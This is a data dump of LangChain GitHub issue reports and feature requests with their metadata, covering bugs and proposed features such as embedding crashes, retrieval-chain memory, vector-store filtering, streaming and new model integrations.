### System Info langchain 0.0.166 Python 3.10.9 Operating System: Kubuntu 23.04 KDE Plasma Version: 5.27.4 KDE Frameworks Version: 5.104.0 Qt Version: 5.15.8 Kernel Version: 6.2.0-20-generic (64-bit) Graphics Platform: X11 Processors: 12 × AMD Ryzen 5 5600X 6-Core Processor Memory: 31.2 GiB of RAM Graphics Processor: NVIDIA GeForce GTX 1080/PCIe/SSE2 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ### Steps to reproduce `git clone https://github.com/imartinez/privateGPT` (follow project instructions) ``` pip install -r requirements.txt wget https://gpt4all.io/models/ggml-gpt4all-j-v1.3-groovy.bin wget https://huggingface.co/Pi3141/alpaca-native-7B-ggml/resolve/397e872bf4c83f4c642317a5bf65ce84a105786e/ggml-model-q4_0.bin mkdir ./models mv *.bin ./models/ cp example.env .env python ingest.py python privateGPT.py ``` ### Expected behavior while `ingest.py` or `privateGPT.py` is running the machine should crash (turn off) debugger shows crash occurs at, `ingest.py`: `llama = LlamaCppEmbeddings(model_path=llama_embeddings_model, n_ctx=model_n_ctx)`
LlamaCppEmbeddings crashing (reboot) Linux Kubuntu 23.04 machine
https://api.github.com/repos/langchain-ai/langchain/issues/4738/comments
1
2023-05-15T17:15:38Z
2023-09-10T16:17:24Z
https://github.com/langchain-ai/langchain/issues/4738
1,710,499,528
4,738
[ "langchain-ai", "langchain" ]
### System Info Main branch. ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Docstring for `ConversationalChatAgent` and `ConversationalAgent` is identical. The user does not know the difference between the two classes. https://github.com/hwchase17/langchain/blob/c70ae562b466ba9a6d0f587ab935fd9abee2bc87/langchain/agents/conversational_chat/base.py#L36-L37 https://github.com/hwchase17/langchain/blob/c70ae562b466ba9a6d0f587ab935fd9abee2bc87/langchain/agents/conversational/base.py#L20-L21 ### Expected behavior The difference should be explained in the doctring.
Identical Docstring for `ConversationalChatAgent` and `ConversationalAgent`.
https://api.github.com/repos/langchain-ai/langchain/issues/4736/comments
4
2023-05-15T16:30:08Z
2023-12-20T16:07:51Z
https://github.com/langchain-ai/langchain/issues/4736
1,710,433,310
4,736
[ "langchain-ai", "langchain" ]
### Feature request In the [Chameleon paper](https://arxiv.org/abs/2304.09842), there are some prompt tricks different from langchain, such as: 1. There is a planner responsible for generating "steps to use the tool". For example, generated "steps" look like: ![image](https://github.com/hwchase17/langchain/assets/26001097/3a770cf8-12bc-4be5-a035-ac6c259cdde7) Langchain also has the ["Plan and Execute" feature](https://python.langchain.com/en/latest/modules/agents/plan_and_execute.html), but each step in the generated plan is a text goal, not a tool. For example: <img width="775" alt="image" src="https://github.com/hwchase17/langchain/assets/26001097/2ba714d4-3937-429c-8fde-e9be50836eb1"> I'm not sure which of the two is better. 2. Heuristically verify the plan generated by the planner. In the paper, the authors used some rules to verify whether the generated steps are valid, such as verifying that "step x must be before step y, otherwise it will be considered invalid". At present, langchain doesn't have such a mechanism. Maybe we can add this feature? ### Motivation To make the plan more accurate ### Your contribution I'm a Python novice, but maybe I can help with the coding
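The heuristic in point 2 can be sketched as a simple rule check over an ordered list of tool names (the module names below are illustrative, loosely following the paper's figures — not an actual langchain or Chameleon API):

```python
# Each rule says "the first tool must run before the second, if both appear".
ORDER_RULES = [
    ("Image_Captioner", "Solution_Generator"),
    ("Knowledge_Retrieval", "Solution_Generator"),
]

def is_valid_plan(plan):
    for before, after in ORDER_RULES:
        if before in plan and after in plan and plan.index(before) > plan.index(after):
            return False
    return True

ok = is_valid_plan(["Image_Captioner", "Knowledge_Retrieval", "Solution_Generator"])
bad = is_valid_plan(["Solution_Generator", "Image_Captioner"])
print(ok, bad)  # True False
```

An invalid plan could then be rejected and regenerated, or repaired with another LLM call.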
How about using the prompts in the Chameleon paper?
https://api.github.com/repos/langchain-ai/langchain/issues/4730/comments
2
2023-05-15T15:17:46Z
2023-09-10T16:17:29Z
https://github.com/langchain-ai/langchain/issues/4730
1,710,317,818
4,730
[ "langchain-ai", "langchain" ]
### System Info langchain: 0.0.169 Python: 3.10.10 MacOS: 12.6.5 (21G531) ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When running the notebook featured here: [https://python.langchain.com/en/latest/modules/chains/index_examples/summarize.html](https://python.langchain.com/en/latest/modules/chains/index_examples/summarize.html), the following cell will fail. ```python chain = load_summarize_chain(llm, chain_type="map_reduce") chain.run(docs) ``` Unless you have pre-installed `tiktoken`, you will receive an error: ```text --------------------------------------------------------------------------- ModuleNotFoundError Traceback (most recent call last) File [/usr/local/lib/python3.10/site-packages/langchain/llms/openai.py:464](https://file+.vscode-resource.vscode-cdn.net/usr/local/lib/python3.10/site-packages/langchain/llms/openai.py:464), in BaseOpenAI.get_num_tokens(self, text) 463 try: --> 464 import tiktoken 465 except ImportError: ModuleNotFoundError: No module named 'tiktoken' ``` Installing `tiktoken` solves the immediate issue. ```python %pip install tiktoken ``` ### Expected behavior The notebook runs without errors.
Summarization Notebook: No module named 'tiktoken'
https://api.github.com/repos/langchain-ai/langchain/issues/4728/comments
2
2023-05-15T15:02:38Z
2023-09-12T16:15:11Z
https://github.com/langchain-ai/langchain/issues/4728
1,710,288,233
4,728
[ "langchain-ai", "langchain" ]
### Feature request Enums don't work well with the structured agent. The data validation works fine, but it would be great if we took the ideas from the `StructuredChatOutputParserWithRetries` and applied them to the StructuredTools. For example, when a validation error is raised due to an enum breach, parse the error message into an LLM with the schema and input and get it to fix the tool input prior to continuing. This would make the StructuredTools more robust IMO. This may be a step too far, but it would also be nice to be able to handle these validation errors in different ways: 1. Correct the error similar to the `StructuredChatOutputParserWithRetries`; 2. Use a different tool that might collect some additional information from the user or tool. ### Motivation I would like to constrain the input parameters of my StructuredTools to an enum so I can avoid bugs. ### Your contribution I am happy to raise a PR for the parser code but I would need to seek guidance from a maintainer on if and how this would work with the existing flow of the software.
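A rough sketch of the requested behavior — catch the enum validation error and let a repair step rewrite the offending value before retrying. In the real flow the repair would be an LLM call given the schema and the error (as in `StructuredChatOutputParserWithRetries`); here a trivial stand-in normalizes the value:

```python
from enum import Enum

class Priority(Enum):
    LOW = "low"
    HIGH = "high"

def llm_fix(bad_value: str, allowed: list) -> str:
    # Stand-in for an LLM repair call that receives the allowed values,
    # the bad input, and the validation error message.
    return bad_value.strip().lower()

def parse_tool_input(value: str) -> Priority:
    try:
        return Priority(value)
    except ValueError:
        # Enum breach: ask the repair step for a corrected value and retry once.
        allowed = [m.value for m in Priority]
        return Priority(llm_fix(value, allowed))

print(parse_tool_input(" High "))  # Priority.HIGH
```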
Enums Don't Work Well With Structured Agent
https://api.github.com/repos/langchain-ai/langchain/issues/4724/comments
3
2023-05-15T13:13:07Z
2023-10-15T16:07:13Z
https://github.com/langchain-ai/langchain/issues/4724
1,710,079,527
4,724
[ "langchain-ai", "langchain" ]
### System Info ``` langchain version==0.0.169 python=3.10.10 platform=dev_containers ``` The code given below is not able to utilise memory for answering questions with references ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [X] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use the following code with the necessary changes on your end to replicate: ``` from dotenv import load_dotenv, find_dotenv from qdrant_client import QdrantClient from langchain.chains import ConversationalRetrievalChain from langchain.chat_models import ChatOpenAI from langchain.vectorstores import Qdrant from langchain.embeddings import OpenAIEmbeddings from langchain.memory import ConversationBufferMemory, RedisChatMessageHistory import os from loguru import logger import redis # Load environment variables from .env file load_dotenv(find_dotenv("../app/.env")) url = os.environ.get("QDRANT_URL") collection_name = os.environ.get("QDRANT_COLLECTION_NAME") openai_api_key = os.environ.get("OPENAI_API_KEY") redis_host = os.environ.get("REDIS_HOST") redis_port = os.environ.get("REDIS_PORT") # Initialize Qdrant client and vector database if url is not None and collection_name is not None: client = QdrantClient(url=url, prefer_grpc=True) embeddings = OpenAIEmbeddings(openai_api_key=openai_api_key) vectordb = Qdrant(client, collection_name, embeddings.embed_query) else: logger.error("Qdrant URL or Collection Name not set in environment variables") # Initialize the LLM if openai_api_key is not None: llm = ChatOpenAI(openai_api_key=openai_api_key, temperature=0, model_name="gpt-3.5-turbo") else: logger.error("OpenAI API key not set in 
environment variables") from langchain.memory import ConversationBufferMemory memory = ConversationBufferMemory( memory_key="chat_history", return_messages=True, output_key="answer" ) def get_chat_history(inputs) -> str: res = [] for message in inputs: if isinstance(message, dict) and "content" in message: res.append(message["content"]) return "\n".join(res) from langchain.prompts import PromptTemplate template = """Answer the question in your own words as truthfully as possible from the context given to you. If you do not know the answer to the question, simply respond with "I don't know. Can you ask another question". If questions are asked where there is no relevant context available, simply respond with "I don't know. Please ask a question relevant to the documents" Context: {context} {chat_history} Human: {question} Assistant:""" prompt = PromptTemplate( input_variables=["context", "chat_history", "question"], template=template ) # Create the custom chain if llm is not None and vectordb is not None: chain = ConversationalRetrievalChain.from_llm( llm=llm, retriever=vectordb.as_retriever(), memory=memory, get_chat_history=get_chat_history, return_source_documents=True, combine_docs_chain_kwargs={'prompt': prompt}) else: logger.error("LLM or Vector Database not initialized") # Initialize Redis connection if redis_host is not None and redis_port is not None: redis_client = redis.Redis(host=redis_host, port=redis_port) else: logger.error("Redis host or port not set in environment variables") session_id = "sample_id" # Retrieve chat history for session from Redis chat_history = redis_client.get(session_id) if chat_history is None: # If chat history does not exist, create a new one chat_history = RedisChatMessageHistory(session_id, url=f"redis://{redis_host}:{redis_port}") else: # If chat history exists, deserialize it from Redis chat_history = RedisChatMessageHistory.deserialize(chat_history, url=f"redis://{redis_host}:{redis_port}") # Retrieve answer from chain 
chain({"question": "Who is Harry potter?", "chat_history": chat_history.messages}) chain({"question": "What are his qualities?", "chat_history": chat_history.messages}) ``` ### Expected behavior `What are his qualities?` should return Harry Potter's qualities and not `I don't know. Please ask a question relevant to the documents.`
ConversationalRetrievalChain doesn't work with memory
https://api.github.com/repos/langchain-ai/langchain/issues/4722/comments
10
2023-05-15T11:46:00Z
2023-09-28T16:06:54Z
https://github.com/langchain-ai/langchain/issues/4722
1,709,924,459
4,722
[ "langchain-ai", "langchain" ]
### Feature request Add summarization task type for HuggingFace APIs. This task type is described by [HuggingFace inference API](https://huggingface.co/docs/api-inference/detailed_parameters#summarization-task) ### Motivation My project utilizes LangChain to connect multiple LLMs, including various HuggingFace models that support the summarization task. Integrating this task type is highly convenient and beneficial. ### Your contribution I will submit a PR.
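For reference, the request body for the summarization task follows the shape documented on the linked HF API page (`{"inputs": ..., "parameters": {...}}`); a small helper to build it might look like this — the helper name is illustrative, and the parameter names should be checked against those docs:

```python
def build_summarization_payload(text, min_length=None, max_length=None):
    # Only include parameters the caller actually set.
    parameters = {
        k: v
        for k, v in {"min_length": min_length, "max_length": max_length}.items()
        if v is not None
    }
    payload = {"inputs": text}
    if parameters:
        payload["parameters"] = parameters
    return payload

payload = build_summarization_payload("A very long article ...", max_length=60)
print(payload)
```

The payload would then be POSTed to the model's inference endpoint with the usual Authorization header.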
Add summarization task type for HuggingFace APIs
https://api.github.com/repos/langchain-ai/langchain/issues/4720/comments
0
2023-05-15T11:23:49Z
2023-05-15T23:26:20Z
https://github.com/langchain-ai/langchain/issues/4720
1,709,886,048
4,720
[ "langchain-ai", "langchain" ]
### Feature request The qdrant vector store has "must" in its filter; is it possible to add "must_not" and/or "should" as well? Ref: https://qdrant.tech/documentation/filtering/ ### Motivation Having a filter is really nice, but it's hard to implement row-level authorization without "must_not". So we can say "must" include ID and "must_not" include ID2, to be able to filter correctly. ### Your contribution I am a front-end developer, and I'm hoping someone with Python competence can handle this.
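In Qdrant's JSON filter format (per the linked docs), the row-level example reads roughly as below; the helper and the `user_id` payload key are illustrative:

```python
def build_row_level_filter(allowed_user, denied_user):
    # "must" / "must_not" clauses as described at
    # https://qdrant.tech/documentation/filtering/
    return {
        "must": [{"key": "user_id", "match": {"value": allowed_user}}],
        "must_not": [{"key": "user_id", "match": {"value": denied_user}}],
    }

f = build_row_level_filter("ID", "ID2")
print(f)
```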
Qdrant filtering methods
https://api.github.com/repos/langchain-ai/langchain/issues/4718/comments
5
2023-05-15T10:49:29Z
2023-09-15T22:12:57Z
https://github.com/langchain-ai/langchain/issues/4718
1,709,831,906
4,718
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I created an AgentExecutor with the ConversationalChatAgent and I could pass a system message as I initialize the agent executor. Is it possible to add system messages to individual prompts, not just one in the beginning? My code: ``` from langchain import PromptTemplate from langchain.agents import ConversationalChatAgent, Tool, AgentExecutor import pickle import os import datetime import logging # from controllers.user_controller import UserController from langchain.llms import OpenAI from langchain.document_loaders import DirectoryLoader from langchain.text_splitter import CharacterTextSplitter # from langchain.vectorstores import FAISS from langchain.embeddings.openai import OpenAIEmbeddings from langchain.chains import RetrievalQA class ChatController(object): def __init__(self): self._create_chat_agent() def _create_chat_agent(self): self.llm = OpenAI(temperature=0, top_p=0.2, presence_penalty=0.4, frequency_penalty=0.2) embeddings = OpenAIEmbeddings() persist_directory = 'myvectordb' vectorstore = Chroma(persist_directory=persist_directory, embedding_function = embeddings) prompt_template = """If the context is not relevant, please answer the question by using your own knowledge about the topic {context} Question: {question} """ PROMPT = PromptTemplate( template=prompt_template, input_variables=["context", "question"] ) chain_type_kwargs = {"prompt": PROMPT} # Initialise Langchain - QA chain qa = RetrievalQA.from_chain_type(llm=self.llm, chain_type="stuff", retriever=vectorstore.as_retriever(), chain_type_kwargs=chain_type_kwargs) tools = [ Tool( name="Document tool", func=qa.run, description="useful for when you need to answer questions." ), ] system_msg = "You are a helpful assistant." 
agent = ConversationalChatAgent.from_llm_and_tools( llm=self.llm, tools=tools, system_message=system_msg ) self.chat_agent = AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, verbose=True, memory=ConversationBufferMemory(memory_key="chat_history", return_messages=True) ) def askAI(self, prompt: str): response = self.chat_agent.run(input=prompt) return {"answer": response} ``` ### Suggestion: _No response_
Issue: Is it possible to add system message with the prompt?
https://api.github.com/repos/langchain-ai/langchain/issues/4716/comments
2
2023-05-15T09:51:06Z
2023-09-10T16:17:39Z
https://github.com/langchain-ai/langchain/issues/4716
1,709,729,606
4,716
[ "langchain-ai", "langchain" ]
### Feature request Right now, streamed LLM output can be seen on stdout in the terminal but not returned as a response. I'm using a conversation chain where I see my output streaming in the terminal, but not when returning the output through an API. ### Motivation Responses can start appearing right away while the user waits on their query, since a lengthier prompt and context also delay the full response. The above implementation can help. ### Your contribution -
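One common pattern (a sketch — the token source below is a fake stand-in for an `AsyncIteratorCallbackHandler`) is to wrap an async generator of server-sent events in FastAPI's `StreamingResponse`:

```python
import asyncio

async def llm_tokens():
    # Stand-in for tokens arriving via AsyncIteratorCallbackHandler.aiter()
    # while the chain runs in a background task.
    for tok in ["The", " answer", " is", " 42"]:
        await asyncio.sleep(0)
        yield tok

async def sse_events():
    # In a FastAPI endpoint this generator would be returned as:
    #   return StreamingResponse(sse_events(), media_type="text/event-stream")
    async for tok in llm_tokens():
        yield f"data: {tok}\n\n"

async def collect():
    return [event async for event in sse_events()]

events = asyncio.run(collect())
print(events[0])  # 'data: The\n\n'
```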
Streaming Responses As Ouput Using FastAPI Support
https://api.github.com/repos/langchain-ai/langchain/issues/4715/comments
16
2023-05-15T06:56:02Z
2023-09-30T16:07:19Z
https://github.com/langchain-ai/langchain/issues/4715
1,709,434,878
4,715
[ "langchain-ai", "langchain" ]
### System Info langchain version:0.0.168 python version 3.10 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction When using the RetrievalQA chain, an error message "Error in on_llm callback: 'AsyncIteratorCallbackHandler' object has no attribute 'on_llm'" This code can run at version 0.0.164 ```python class Chain: def __init__(self): self.cb_mngr_stdout = AsyncCallbackManager([StreamingStdOutCallbackHandler()]) self.cb_mngr_aiter = AsyncCallbackManager([AsyncIteratorCallbackHandler()]) self.qa_stream = None self.qa = None self.make_chain() def make_chain(self): chain_type_kwargs = {"prompt": MyPrompt.get_retrieval_prompt()} qa = RetrievalQA.from_chain_type(llm=ChatOpenAI(model_name="gpt-3.5-turbo", max_tokens=1500, temperature=.1), chain_type="stuff", retriever=Retrieval.vectordb.as_retriever(search_kwargs={"k": Retrieval.context_num}), chain_type_kwargs=chain_type_kwargs, return_source_documents=True) qa_stream = RetrievalQA.from_chain_type(llm=ChatOpenAI(model_name="gpt-3.5-turbo", max_tokens=1500, temperature=.1, streaming=True, callback_manager=self.cb_mngr_aiter), chain_type="stuff", retriever=Retrieval.vectordb.as_retriever(search_kwargs={"k": Retrieval.context_num}), chain_type_kwargs=chain_type_kwargs, return_source_documents=True) self.qa = qa self.qa_stream = qa_stream ``` call function ```python resp = await chains.qa.acall({"query": "xxxxxxx"}) # no problem resp = await chains.qa_stream.acall({"query": "xxxxxxxx"}) # error ``` ### Expected behavior self.qa_stream return result like self.qa,or like langchain version 0.0.164
Error in on_llm callback: 'AsyncIteratorCallbackHandler' object has no attribute 'on_llm'
https://api.github.com/repos/langchain-ai/langchain/issues/4714/comments
2
2023-05-15T06:30:00Z
2023-05-16T01:36:23Z
https://github.com/langchain-ai/langchain/issues/4714
1,709,405,469
4,714
[ "langchain-ai", "langchain" ]
### Feature request https://platform.openai.com/docs/api-reference/embeddings/create?lang=python supports a `user` parameter, where we can pass user details to the openai api. https://github.com/hwchase17/langchain/blob/master/langchain/embeddings/openai.py#L66 can take a `user` parameter (optional), which needs to be passed via the embed_with_retry function. ### Motivation We use it to track user details - this could be an appkey, etc. ### Your contribution Yes, I can create a PR. Please let me know the process.
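A minimal sketch of how the optional parameter could be threaded through to the API call. `build_embed_params` is a hypothetical helper for illustration, not the actual langchain implementation:

```python
# Hypothetical sketch: thread an optional `user` field into the payload that
# would be sent to the OpenAI embeddings endpoint (which accepts `user`).
def build_embed_params(texts, model="text-embedding-ada-002", user=None):
    params = {"input": texts, "model": model}
    if user is not None:  # only include the field when the caller sets it
        params["user"] = user
    return params
```

With this shape, omitting `user` leaves the payload unchanged, so existing callers are unaffected.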
Support for user parameter in OpenAI Embeddings Create class, which exists in OpenAI API
https://api.github.com/repos/langchain-ai/langchain/issues/4711/comments
4
2023-05-15T05:26:16Z
2023-12-09T16:06:51Z
https://github.com/langchain-ai/langchain/issues/4711
1,709,341,947
4,711
[ "langchain-ai", "langchain" ]
I was using RetrievalQA.from_chain_type, to which I had passed parameters as: `RetrievalQA.from_chain_type(llm, chain_type, retriever = chroma_db.as_retriever(), return_source_documents = True)` Here, return_source_documents = True only returns the chunks from which it generated the response. _Is there a way to also get the similarity score returned for matched chunks?_ (Say, if there are 4 chunks it found most relevant to the query, how can I get scores in decreasing order of similarity?)
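One workaround (a sketch, assuming a vector store that exposes `similarity_search_with_score`, as Chroma does) is to query the store directly and order the `(document, score)` pairs yourself:

```python
# Sketch: bypass return_source_documents and ask the vector store for scores,
# e.g. results = chroma_db.similarity_search_with_score(query, k=4)  # assumed call
def rank_results(results, higher_is_better=False):
    """Sort (doc, score) pairs so the most similar chunk comes first.

    Chroma returns a distance, where smaller means more similar; set
    higher_is_better=True for stores that return a similarity score instead.
    """
    return sorted(results, key=lambda pair: pair[1], reverse=higher_is_better)
```

Whether "decreasing similarity" means ascending or descending raw numbers depends on the store's metric, hence the flag.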
How to use return_source_documents to also extract similarity score??
https://api.github.com/repos/langchain-ai/langchain/issues/4710/comments
13
2023-05-15T04:44:31Z
2024-05-14T16:15:02Z
https://github.com/langchain-ai/langchain/issues/4710
1,709,303,133
4,710
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://python.langchain.com/en/latest/modules/chains/examples/sqlite.html#customize-prompt When looking at the Customize prompt example, the subsequent `db_chain.run()` command is just like the pre-prompt chain. It is currently like: `db_chain.run("How many employees are there in the foobar table?")` Shouldn't it be something like: `db_chain.run({'input': "How many employees are there in the foobar table?", 'table':'foobar', 'dialect':'testing'})` since we added the custom prompt to the db_chain? ### Idea or request for content: _No response_
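For context, the chain fills in `table_info` and `dialect` itself at run time, so `db_chain.run()` still takes only the question string. A sketch of how the custom prompt's variables get populated (the concrete values below are illustrative only):

```python
# The custom prompt declares three variables, but the chain supplies two of
# them itself; the caller provides only the question.
template = (
    "Only use the following tables:\n{table_info}\n"
    "Dialect: {dialect}\n"
    "Question: {input}"
)
filled = template.format(
    input="How many employees are there in the foobar table?",
    table_info="CREATE TABLE foobar (...)",  # fetched from the DB by the chain
    dialect="sqlite",                        # taken from the engine's dialect
)
```

This is why the documented `db_chain.run("...")` call works unchanged after the prompt is customized.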
DOC: SQL Chain Example - Customise Prompt
https://api.github.com/repos/langchain-ai/langchain/issues/4703/comments
17
2023-05-15T02:10:11Z
2023-10-19T16:08:23Z
https://github.com/langchain-ai/langchain/issues/4703
1,709,196,707
4,703
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. The embedding models of cohere are 1. embed-english-light-v2.0 2. embed-english-v2.0 3. embed-multilingual-v2.0 The corresponding embedding wrapper in langchain will need to reflect that. Currently it defaults to `large`. ### Suggestion: _No response_
Issue: The cohere embedding model has the model defaulted to large. These names are deprecated
https://api.github.com/repos/langchain-ai/langchain/issues/4694/comments
0
2023-05-15T00:09:11Z
2023-05-16T23:27:25Z
https://github.com/langchain-ai/langchain/issues/4694
1,709,123,191
4,694
[ "langchain-ai", "langchain" ]
### Feature request It would be nice to have the ability to get the positions of the extracted texts - i.e. the beginning and end (character position) of the split text from the text body, or the line and line character position of the extracted text. ### Motivation I'm working on a way ingest a code repo into a vector store and link it to a graph database. The line and character position would be incredibly useful in the metadata to interface the two. This could provide a richer context for tracking data positions and could offer mechanisms for testing. ### Your contribution I'd be happy to submit a PR regarding this if it makes sense to others.
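A minimal sketch of recovering start/end offsets after the fact: scan the original text for each chunk, resuming the search just past the previous match so overlapping chunks still resolve. `chunk_positions` is a hypothetical helper, not an existing langchain API:

```python
def chunk_positions(text, chunks):
    """Return (start, end) character offsets for each chunk, in order.

    Assumes the splitter emits chunks in document order; overlap between
    consecutive chunks is fine because the search resumes one character
    past the previous chunk's start.
    """
    positions = []
    cursor = 0
    for chunk in chunks:
        start = text.find(chunk, cursor)
        if start == -1:  # chunk text was altered by the splitter; no offset
            positions.append(None)
            continue
        positions.append((start, start + len(chunk)))
        cursor = start + 1
    return positions
```

Line/column positions could then be derived from the character offsets by counting newlines up to each start index.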
Ability to get the character or the line and line character positions from a split text
https://api.github.com/repos/langchain-ai/langchain/issues/4692/comments
1
2023-05-14T23:10:03Z
2023-09-10T16:17:45Z
https://github.com/langchain-ai/langchain/issues/4692
1,709,106,195
4,692
[ "langchain-ai", "langchain" ]
### System Info langchain version: 0.0.168 OS: Mac ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Hi, I am trying to play with SQLDatabaseChain and I tried to connect it to a PostgreSQL database. I tested the URL, and it works well with the SQLAlchemy engine: I was able to execute queries successfully. Here is my code using SQLDatabaseChain: ```Python db = SQLDatabase.from_uri(url, sample_rows_in_table_info = 10, ) ``` However, it keeps showing that there are no tables. I used `db.get_table_info()` and it always returns an empty set. Do you have any ideas? Appreciated! ### Expected behavior I expected it to inspect the schema correctly.
SQLDatabaseChain did not read PostgreSQL database table information correctly
https://api.github.com/repos/langchain-ai/langchain/issues/4690/comments
6
2023-05-14T22:58:23Z
2024-01-30T00:42:49Z
https://github.com/langchain-ai/langchain/issues/4690
1,709,102,621
4,690
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I encountered a `TypeError: string indices must be integers` error when using the library to retrieve chat messages from a PostgreSQL database. This error occurs specifically in the `messages_from_dict` function. Upon further investigation, it appears that the error arises when trying to access the "type" field of a message dictionary. The `messages_from_dict` function is expected to convert a list of dictionaries into a list of `BaseMessage` objects, but it fails to handle the dictionary properly. To reproduce the issue, follow these steps: 1. Set up the library to use a PostgreSQL database as the chat message history storage. 2. Start a conversation and exchange messages. 3. Retrieve the chat history using the `messages` property of the `PostgresChatMessageHistory` class. The error occurs when the `messages` property executes the following code snippet: ```python items = [record["message"] for record in self.cursor.fetchall()] messages = messages_from_dict(items) ``` The `messages_from_dict` function attempts to convert each dictionary in the items list to a `BaseMessage` object. However, it fails to properly handle the dictionary structure, resulting in the TypeError. Environment: Library version: [Specify library version] Python version: [Specify Python version] PostgreSQL version: [Specify PostgreSQL version] Operating system: [Specify operating system] ### Suggestion: To resolve this issue, the implementation of the `messages_from_dict` function needs to be reviewed and updated accordingly. It should correctly handle the structure of each message dictionary and create `BaseMessage` objects with the expected attributes. Additionally, it would be helpful to provide clearer documentation or examples on how to set up the PostgreSQL chat message history and ensure the expected structure of the messages stored in the message_store table.
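One likely cause (an assumption, not confirmed from the report): if the `message` column is `text` rather than `jsonb`, `fetchall()` returns JSON *strings*, and indexing a string with `"type"` raises exactly this `TypeError`. A sketch of a defensive decode step — `coerce_message_records` is a hypothetical helper, not the library's code:

```python
import json

def coerce_message_records(rows):
    """Decode each row's "message" field into a dict before it reaches
    messages_from_dict, which expects dicts shaped like
    {"type": "human", "data": {"content": "..."}}."""
    items = []
    for record in rows:
        message = record["message"]
        if isinstance(message, str):  # text column: still JSON-encoded
            message = json.loads(message)
        items.append(message)
    return items
```

Rows whose column is already `jsonb` pass through untouched, so the helper is safe for either schema.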
Issue: TypeError: string indices must be integers when retrieving messages from PostgreSQL
https://api.github.com/repos/langchain-ai/langchain/issues/4684/comments
6
2023-05-14T19:53:52Z
2023-12-03T16:07:36Z
https://github.com/langchain-ai/langchain/issues/4684
1,709,054,913
4,684
[ "langchain-ai", "langchain" ]
### System Info Langchain 0.0.168, Python 3.11.3 ### Who can help? @anihamde ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = DeepLake(dataset_path=f"hub://{username_activeloop}/{lake_name}", embedding_function=embeddings, overwrite=False) ### Expected behavior Would expect overwrite to not take place; however, it does. This is easily resolvable, and I'll share a PR to address this shortly.
Setting overwrite to False on DeepLake constructor still overwrites
https://api.github.com/repos/langchain-ai/langchain/issues/4682/comments
1
2023-05-14T19:15:22Z
2023-09-10T16:17:56Z
https://github.com/langchain-ai/langchain/issues/4682
1,709,045,521
4,682
[ "langchain-ai", "langchain" ]
### Feature request Hi team, I am a developer relations engineer working at Google on PaLM API. I want to participate and contribute to adding Google PaLM potentially to LangChain. How is our current dev stage of adding Google PaLM API? ### Motivation Better user experience with PaLM API :) ### Your contribution Still need discussion, might be PRs, design discussions, or others.
Add Google PaLM API
https://api.github.com/repos/langchain-ai/langchain/issues/4681/comments
20
2023-05-14T19:08:05Z
2024-01-30T00:52:41Z
https://github.com/langchain-ai/langchain/issues/4681
1,709,043,509
4,681
[ "langchain-ai", "langchain" ]
